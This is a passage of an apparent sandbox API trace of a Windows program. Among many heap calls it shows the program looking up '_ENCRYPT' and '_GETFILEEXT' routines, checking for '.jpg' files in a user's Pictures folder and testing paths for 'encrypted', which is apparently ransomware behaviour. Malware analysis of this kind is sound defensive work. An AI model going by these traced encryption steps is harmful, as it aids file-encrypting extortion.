returned 0x88ca18 [0040.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0040.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0040.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0040.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0040.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0040.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0040.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0040.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0040.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0040.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0040.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0040.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0040.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0040.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0040.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0040.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0040.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0040.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0040.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0040.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0040.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0040.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0040.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0040.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0040.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0040.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0040.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0040.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0040.074] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0040.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0040.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0040.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0040.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0040.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0040.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0040.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0040.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.076] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0040.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0040.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0040.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0040.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0040.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0040.076] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0040.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0040.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0040.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0040.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0040.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0040.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0040.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0040.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0040.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0040.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0040.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0040.077] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0040.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0040.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0040.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0040.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0040.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0040.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0040.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0040.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0040.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0040.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0040.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0040.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.078] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0040.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0040.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce38 [0040.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88ce38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0040.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0040.078] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0040.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0040.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0040.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0040.078] CloseHandle (hObject=0x140) returned 1 [0040.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0040.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0040.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0040.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0040.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0040.079] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0040.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0040.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0040.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0040.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0040.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0040.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0040.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0040.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0040.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0040.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0040.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0040.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0040.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0040.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0040.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.079] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0040.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0040.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0040.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0040.079] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.079] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0040.079] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.079] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0040.080] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0040.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.080] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.080] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.080] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.080] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x304524a0, ftCreationTime.dwHighDateTime=0x1d5bcc3, ftLastAccessTime.dwLowDateTime=0x6caaa870, ftLastAccessTime.dwHighDateTime=0x1d5be12, ftLastWriteTime.dwLowDateTime=0x6caaa870, ftLastWriteTime.dwHighDateTime=0x1d5be12, nFileSizeHigh=0x0, nFileSizeLow=0xdda0, dwReserved0=0x0, dwReserved1=0x777648, cFileName="ZFzFoo26_z1.jpg", cAlternateFileName="ZFZFOO~1.JPG")) returned 0x7c20c0 [0040.080] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0040.080] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.080] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x304524a0, ftCreationTime.dwHighDateTime=0x1d5bcc3, ftLastAccessTime.dwLowDateTime=0x6caaa870, ftLastAccessTime.dwHighDateTime=0x1d5be12, ftLastWriteTime.dwLowDateTime=0x6caaa870, ftLastWriteTime.dwHighDateTime=0x1d5be12, nFileSizeHigh=0x0, nFileSizeLow=0xdda0, dwReserved0=0x0, dwReserved1=0x777648, cFileName="ZFzFoo26_z1.jpg", cAlternateFileName="ZFZFOO~1.JPG")) returned 0x7c20c0 [0040.080] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0040.080] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 